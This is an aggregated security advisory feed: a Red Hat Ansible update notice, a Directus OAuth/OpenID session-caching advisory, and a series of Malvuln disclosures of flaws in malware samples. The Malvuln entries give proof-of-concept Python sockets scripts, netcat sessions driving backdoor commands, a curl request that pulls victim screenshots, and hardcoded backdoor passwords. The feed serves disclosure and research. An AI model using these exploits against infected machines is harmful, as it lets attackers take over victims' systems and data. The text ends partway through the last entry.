Red Hat Security Advisory 2024-6765-03 - An update is now available for Red Hat Ansible Automation Platform 2.4.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6765.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix UpdateAdvisory ID:        RHSA-2024:6765-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6765Issue date:         2024-09-18Revision:           03CVE Names:          CVE-2024-7143====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* python3-pulpcore/python39-pulpcore: RBAC permissions incorrectly assigned in tasks that create objects (CVE-2024-7143)* python3-urllib3/python39-urllib3: urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)* receptor: golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)* receptor: golang: net: malformed DNS message can cause infinite loop (CVE-2024-24788)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes for automation controller:* Updated fallback to use RHSM subscription credential for shipping analytics data if analytics gathering is enabled (AAP-30228)* Upgraded 'channels-redis' library to fix Redis connection leak (AAP-30124)* automation-controller has been updated to 4.5.11Additional fixes:* python3/python39-django has been updated to 4.2.16* python3/python39-pulpcore has been updated to 3.28.32* python3/python39-urllib3 has been updated to 1.26.20* receptor has been updated to 1.4.8-1.1Solution:CVEs:CVE-2024-7143References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2279814https://bugzilla.redhat.com/show_bug.cgi?id=2292787https://bugzilla.redhat.com/show_bug.cgi?id=2292788https://bugzilla.redhat.com/show_bug.cgi?id=2300125

Red Hat Security Advisory 2024-6765-03

Backdoor.Win32.CCInvader.10 malware suffers from a bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/cb86af8daa35f6977c80814ec6e40d63.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.CCInvader.10Vulnerability: Authentication BypassDescription: The malware runs an FTP server.  Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.Family: CCInvaderType: PE32MD5: cb86af8daa35f6977c80814ec6e40d63SHA256: 8420788f3a575cade5f579bcbf56bb67566bca27c2b9d11dbbafffadef491f31Vuln ID: MVID-2024-0694Disclosure: 09/17/2024Exploit/PoC:ncat64.exe 192.168.18.125 21220 ICS FTP Server readyUSER gg331 Password required for ggPASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component Suite250 CWD command successful. "C:/" is current directory.PWD257 "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,243,249).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=62457   #243 x 256 + 249DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.CCInvader.10 MVID-2024-0694 Authentication Bypass

Backdoor.Win32.BlackAngel.13 malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d1523df44da5fd40df92602b8ded59c8.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BlackAngel.13Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1850. Third party adversaries who can reach an infected host can issue commands made available by the backdoor. Example, send messages to victim "!msg", open launch the browser and open webpages "!url" etc.Family: BlackAngelType: PE32MD5: d1523df44da5fd40df92602b8ded59c8SHA256: 8a6e876f7452ae0a11342b852c70771a7f80b87c2e451656aaebb18b350c4b27Vuln ID: MVID-2024-0695Disclosure: 09/17/2024Exploit/PoC:nc64.exe x.x.x.x 1850Connected to host (DESKTOP-3C4IQJO)                                                                                                                                                                                                              !msg GG Forever!!msg Greetz Edu_Braun_0day, Indoushka, Dirty0tis!url https://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt!quit[commands list]!msg!opencd!closecd!exitwin!reboot!logoff!getdrive!gettree!getfile!putfile!ren!del!swap!noswap!mdisable!kdisable!url!bck!sound!txt!dos!beep!nobeep!quit!hangDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.BlackAngel.13 MVID-2024-0695 Code Execution

Backdoor.Win32.Delf.yj malware suffers from an information leakage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f991c25f1f601cc8d14dca4737415238.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Delf.yjVulnerability: Information DisclosureDescription: The malware listens on TCP port 8080. Third-party adversaries who can reach an infected system, can  download screen captures of a victims machine by making a simple HTTP GET request.Family: DelfType: PE32MD5: f991c25f1f601cc8d14dca4737415238SHA256: 512af3cc193e9cb7f0b6204889bc457affded79aa62c41ab20a74625e4279caaVuln ID: MVID-2024-0693Dropped files: dxdiag.scrDisclosure: 09/17/2024Exploit/PoC:curl 192.168.18.125:8080  --output victim.jpg  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  106k  100  106k    0     0   338k      0 --:--:-- --:--:-- --:--:--  341kDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.yj MVID-2024-0693 Information Disclosure

### Summary
Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include `redirect` query string.

For example:
- Project is configured with OpenID or OAuth2
- Project is configured with cache enabled
- User tries to login via SSO link, but without `redirect` query string
- After successful login, credentials are cached
- If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user

The SSO link is something like `https://directus.example.com/auth/login/openid/callback`, where `openid` is the name of the OpenID provider configured in Directus

### Details
This happens because on that endpoint for both OpenId and Oauth2 Directus is using the `respond` middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
And for OAuth2 can be seen here
https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428

### PoC
- Create a new Directus project
- Set `CACHE_ENABLED` to true
- Set `CACHE_STORE` to `redis` for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)
- Configure `REDIS` with redis string or redis host, port, user, etc.
- Set `AUTH_PROVIDERS` to `openid`
- Set `PUBLIC_URL` to the the main URL of your project . 	For example, `PUBLIC_URL: http://localhost:8055`
- Configure `AUTH_OPENID_CLIENT_ID`, `AUTH_OPENID_CLIENT_SECRET`, `AUTH_OPENID_ISSUER_URL` with proper OpenID configurations
- Be sure that on OpenID external app you have configured Redirect URI to `http://localhost:8055/auth/login/openid/callback`
- Run Directus
- Open the SSO link like `http://localhost:8055/auth/login/openid/callback`
- Do the authentication on the OpenID external webpage
- Verify that it you got redirected to a page with a JSON including `access_token` property
- Be sure all anonymous mode windows are closed
- Open an anonymous window and go to the SSO Link `http://localhost:8055/auth/login/openid/callback` and see you have the same credentials, even though you don't have any session because you are in anonymous mode

### Impact
All projects using OpenID or OAuth 2, that does not include `redirect` query string on loggin in users.


**Summary**

Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include redirect query string.

For example:

*   Project is configured with OpenID or OAuth2
*   Project is configured with cache enabled
*   User tries to login via SSO link, but without redirect query string
*   After successful login, credentials are cached
*   If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user

The SSO link is something like https://directus.example.com/auth/login/openid/callback, where openid is the name of the OpenID provider configured in Directus

**Details**

This happens because on that endpoint for both OpenId and Oauth2 Directus is using the respond middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.  
For OpenID, this can be seen here:  
https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459  
And for OAuth2 can be seen here  
https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428

**PoC**

*   Create a new Directus project
*   Set CACHE_ENABLED to true
*   Set CACHE_STORE to redis for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)
*   Configure REDIS with redis string or redis host, port, user, etc.
*   Set AUTH_PROVIDERS to openid
*   Set PUBLIC_URL to the the main URL of your project . For example, PUBLIC_URL: http://localhost:8055
*   Configure AUTH_OPENID_CLIENT_ID, AUTH_OPENID_CLIENT_SECRET, AUTH_OPENID_ISSUER_URL with proper OpenID configurations
*   Be sure that on OpenID external app you have configured Redirect URI to http://localhost:8055/auth/login/openid/callback
*   Run Directus
*   Open the SSO link like http://localhost:8055/auth/login/openid/callback
*   Do the authentication on the OpenID external webpage
*   Verify that it you got redirected to a page with a JSON including access_token property
*   Be sure all anonymous mode windows are closed
*   Open an anonymous window and go to the SSO Link http://localhost:8055/auth/login/openid/callback and see you have the same credentials, even though you don't have any session because you are in anonymous mode

**Impact**

All projects using OpenID or OAuth 2, that does not include redirect query string on loggin in users.

**References**

*   GHSA-cff8-x7jv-4fm8
*   directus/directus@4aace0b
*   directus/directus@769fa22
*   https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
*   https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459

GHSA-cff8-x7jv-4fm8: Session is cached for OpenID and OAuth2 if `redirect` is not used

Backdoor.Win32.Symmi.qua malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Symmi.qua  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Symmi  
Type: PE32  
MD5: 6e81618678ddfee69342486f6b5ee780  
SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3  
Vuln ID: MVID-2024-0692  
Dropped files: ksomnbi.dll   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/03/2024

Memory Dump:  
(1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002  
eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:007> .ecxr  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

FAULTING_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

EXCEPTION_RECORD:  027ff23c -- (.exr 0x27ff23c)  
ExceptionAddress: 10001f32 (ksomnbi+0x00001f32)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 02800000  
Attempt to write to address 02800000

PROCESS_NAME:  Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  027ff28c -- (.cxr 0x27ff28c)  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00  
Resetting default scope

WRITE_ADDRESS:  02800000 

FOLLOWUP_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

FAULTING_THREAD:  000003f0

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 10002fc3 to 10001f32

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32  
027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3  
027fff84 41414141 41414141 41414141 41414141 0x41414141  
027fff88 41414141 41414141 41414141 41414141 0x41414141  
027fff8c 41414141 41414141 41414141 41414141 0x41414141  
027fff90 41414141 41414141 41414141 41414141 0x41414141  
027fff94 41414141 41414141 41414141 41414141 0x41414141  
027fff98 41414141 41414141 41414141 41414141 0x41414141  
027fff9c 41414141 41414141 41414141 41414141 0x41414141  
027fffa0 41414141 41414141 41414141 41414141 0x41414141  
027fffa4 41414141 41414141 41414141 41414141 0x41414141  
027fffa8 41414141 41414141 41414141 41414141 0x41414141  
027fffac 41414141 41414141 41414141 41414141 0x41414141  
027fffb0 41414141 41414141 41414141 41414141 0x41414141  
027fffb4 41414141 41414141 41414141 41414141 0x41414141  
027fffb8 41414141 41414141 41414141 41414141 0x41414141  
027fffbc 41414141 41414141 41414141 41414141 0x41414141  
027fffc0 41414141 41414141 41414141 41414141 0x41414141  
027fffc4 41414141 41414141 41414141 41414141 0x41414141  
027fffc8 41414141 41414141 41414141 41414141 0x41414141  
027fffcc 41414141 41414141 41414141 41414141 0x41414141  
027fffd0 41414141 41414141 41414141 41414141 0x41414141  
027fffd4 41414141 41414141 41414141 41414141 0x41414141  
027fffd8 41414141 41414141 41414141 41414141 0x41414141  
027fffdc 41414141 41414141 41414141 41414141 0x41414141  
027fffe0 41414141 41414141 41414141 41414141 0x41414141  
027fffe4 41414141 41414141 41414141 41414141 0x41414141  
027fffe8 41414141 41414141 41414141 41414141 0x41414141  
027fffec 41414141 41414141 41414141 41414141 0x41414141  
027ffff0 41414141 41414141 41414141 00000000 0x41414141  
027ffff4 41414141 41414141 00000000 00000000 0x41414141  
027ffff8 41414141 00000000 00000000 00000000 0x41414141  
027ffffc 00000000 00000000 00000000 00000000 0x41414141

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ksomnbi+1f32

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ksomnbi

IMAGE_NAME:  ksomnbi.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  537a7d0a

STACK_COMMAND:  .cxr 0x27ff28c ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32

Followup: MachineOwner  
---------

0:007> !exchain  
027ff0f0: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
027ff710: ksomnbi+30df (100030df)  
027fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

def doit():

    MALWARE_HOST="x.x.x.x"  
    PORT=6917   #random port

    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST  
    s.send(PAYLOAD.encode())  
    s.close()

while 1:  
    doit()  
    time.sleep(0.5)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Symmi.qua MVID-2024-0692 Buffer Overflow

HackTool.Win32.Freezer.br (WinSpy) malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2992129c565e025ebcb0bb6f80c77812.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: HackTool.Win32.Freezer.br (WinSpy)Vulnerability: Insecure Credential StorageDescription: The malware listens on TCP ports 443, 80 and provides a web interface for remote access to victim information like screenshots etc.The username "AZURE" is in a hidden in a file named "resu.dll" under AppData\Local\Temp\Compress0 and the password is stored in cleartext "DREAMS" in "ssap.dll"Family: FreezerType: PE32MD5: 2992129c565e025ebcb0bb6f80c77812SHA256: e47a267cdc2a8443d5d7184e1023eef81c4b6a5bf9ecc24f1c6c345fe98bab8eVuln ID: MVID-2024-0691Disclosure: 09/03/2024Exploit/PoC:Login to the Win-Spy web UI using the credentials "AZURE" / "DREAMS" Web URLs available on the infected host.WebCam Shots (0)http://VICTIM_MACHINE/audio/Screen Shots (16)http://VICTIM_MACHINE/pictures/Reports (2)http://VICTIM_MACHINE/documents/Downloadclog.txtlog.txtDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

HackTool.Win32.Freezer.br (WinSpy) MVID-2024-0691 Insecure Credential Storage

Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 